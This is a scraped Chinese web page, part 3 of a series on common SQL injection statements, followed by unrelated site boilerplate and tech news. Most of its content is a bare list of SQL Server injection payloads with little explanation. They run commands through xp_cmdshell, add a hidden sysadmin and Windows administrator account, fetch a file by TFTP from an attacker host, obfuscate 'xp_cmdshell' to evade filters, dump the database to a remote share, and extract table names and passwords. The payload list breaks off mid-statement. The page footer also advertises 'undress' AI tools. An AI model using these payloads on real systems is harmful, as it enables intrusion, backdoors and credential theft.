常用SQL注射语句解析(3)_MySQL
bitsCN.com
aths(path)
values(@test)--
;use ku1;--
;create table cmd (str image);-- 建立image类型的表cmd
存在xp_cmdshell的测试过程:
;exec master..xp_cmdshell 'dir'
;exec master.dbo.sp_addlogin jiaoniang$;-- 加SQL帐号
;exec master.dbo.sp_password null,jiaoniang$,1866574;--
;exec master.dbo.sp_addsrvrolemember jiaoniang$ sysadmin;--
;exec master.dbo.xp_cmdshell 'net user jiaoniang$ 1866574 /workstations:*
/times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
;exec master.dbo.xp_cmdshell 'net localgroup administrators jiaoniang$
/add';--
exec master..xp_servicecontrol 'start', 'schedule' 启动服务
exec master..xp_servicecontrol 'start', 'server'
; DECLARE @shell INT EXEC SP_OACreate 'wscript.shell',@shell OUTPUT EXEC
SP_OAMETHOD @shell,'run',null, 'C:/WINNT/system32/cmd.exe /c net user
jiaoniang$ 1866574 /add'
;DECLARE @shell INT EXEC SP_OACreate 'wscript.shell',@shell OUTPUT EXEC
SP_OAMETHOD @shell,'run',null, 'C:/WINNT/system32/cmd.exe /c net
localgroup administrators jiaoniang$ /add'
'; exec master..xp_cmdshell 'tftp -i youip get file.exe'-- 利用TFTP上传文件
;declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:/'
;declare @a sysname set @a='xp'+'_cm’+’dshell' exec @a 'dir c:/'
;declare @a;set @a=db_name();backup database @a to
disk='你的IP你的共享目录bak.dat'
如果被限制则可以。
select * from openrowset('sqloledb','server';'sa';'','select ''OK!'' exec
master.dbo.sp_addlogin hax')
查询构造:
Select * FROM news Where id=... AND topic=... AND .....
admin'and 1=(select count(*) from [user] where username='victim' and
right(left(userpass,01),1)='1') and userpass '
select 123;--
;use master;--
:a' or name like 'fff%';-- 显示有一个叫ffff的用户哈。
and 1(select count(email) from [user]);--
;update [users] set email=(select top 1 name from sysobjects where
xtype='u' and status>0) where name='ffff';--
;update [users] set email=(select top 1 id from sysobjects where xtype='u'
and name='ad') where name='ffff';--
';update [users] set email=(select top 1 name from sysobjects where
xtype='u' and id>581577110) where name='ffff';--
';update [users] set email=(select top 1 count(id) from password) where
name='ffff';--
';update [users] set email=(select top 1 pwd from password where id=2)
where name='ffff';--
';update [users] set email=(select top 1 name from password where id=2)
where name='ffff';--
上面的语句是得到数据库中的第一个用户表,并把表名放在ffff用户的邮箱字段中。
通过查看ffff的用户资料可得第一个用表叫ad
然后根据表名ad得到这个表的ID 得到第二个表的名字
insert into users values( 666,
char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73),
char(0x63)+char(0x68)+char(0x72)+c
bitsCN.com
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
AI Hentai Generator
Generate AI Hentai for free.
Hot Article
Hot Tools
Notepad++7.3.1
Easy-to-use and free code editor
SublimeText3 Chinese version
Chinese version, very easy to use
Zend Studio 13.0.1
Powerful PHP integrated development environment
Dreamweaver CS6
Visual web development tools
SublimeText3 Mac version
God-level code editing software (SublimeText3)
Hot Topics
Huawei Watch GT 5 smartwatch gets update with new features
Oct 03, 2024 am 06:25 AM
Huawei is rolling out software version 5.0.0.100(C00M01) for the Watch GT 5 and the Watch GT 5 Prosmartwatchesglobally. These two smartwatches recently launched in Europe, with the standard model arriving as the company’s cheapest model. This Harmony
Tekken\'s Colonel Sanders dream fried by KFC
Oct 02, 2024 am 06:07 AM
Katsuhiro Harada, the Tekken series director, once seriously tried to bring Colonel Sanders into the iconic fighting game. In an interview with TheGamer, Harada revealed that he pitched the idea to KFC Japan, hoping to add the fast-food legend as a g
First look: Leaked unboxing video of upcoming Anker Zolo 4-port 140W wall charger with display
Oct 01, 2024 am 06:32 AM
Earlier in September 2024, Anker's Zolo 140W charger was leaked, and it was a big deal since it was the first-ever wall charger with a display from the company. Now, a new unboxing video from Xiao Li TV on YouTube gives us a first-hand look at the hi
Samsung Galaxy Z Fold Special Edition revealed to land in late October as conflicting name emerges
Oct 01, 2024 am 06:21 AM
The launch of Samsung's long-awaited 'Special Edition' foldable has taken another twist. In recent weeks, rumours about the so-called Galaxy Z Fold Special Edition went rather quiet. Instead, the focus has shifted to the Galaxy S25 series, including
New Xiaomi Mijia Graphene Oil Heater with HyperOS arrives
Oct 02, 2024 pm 09:02 PM
Xiaomi will shortly launch the Mijia Graphene Oil Heater in China. The company recently ran a successful crowdfunding campaign for the smart home product, hosted on its Youpin platform. According to the page, the device has already started to ship to
Garmin releases Adventure Racing activity improvements for multiple smartwatches via new update
Oct 01, 2024 am 06:40 AM
Garmin is ending the month with a new set of stable updates for its latest high-end smartwatches. To recap, the company released System Software 11.64 to combat high battery drain across the Enduro 3, Fenix E and Fenix 8 (curr. $1,099.99 on Amazon).
Cybertruck FSD reviews praise quick lane switching and full-screen visualizations
Oct 01, 2024 am 06:16 AM
Tesla is rolling out the latest Full Self-Driving (Supervised) version 12.5.5 and with it comes the promised Cybertruck FSD option at long last, ten months after the pickup went on sale with the feature included in the Foundation Series trim price. F
Manjaro 24.1 \'Xahea\' launches with KDE Plasma 6.1.5, VirtualBox 7.1, and more
Oct 02, 2024 am 06:06 AM
With a history of over one decade, Manjaro is regarded as one of the most user-friendly Linux distros suitable for both beginners and power users, being easy to install and use. Mostly developed in Austria, Germany, and France, this Arch-based distro
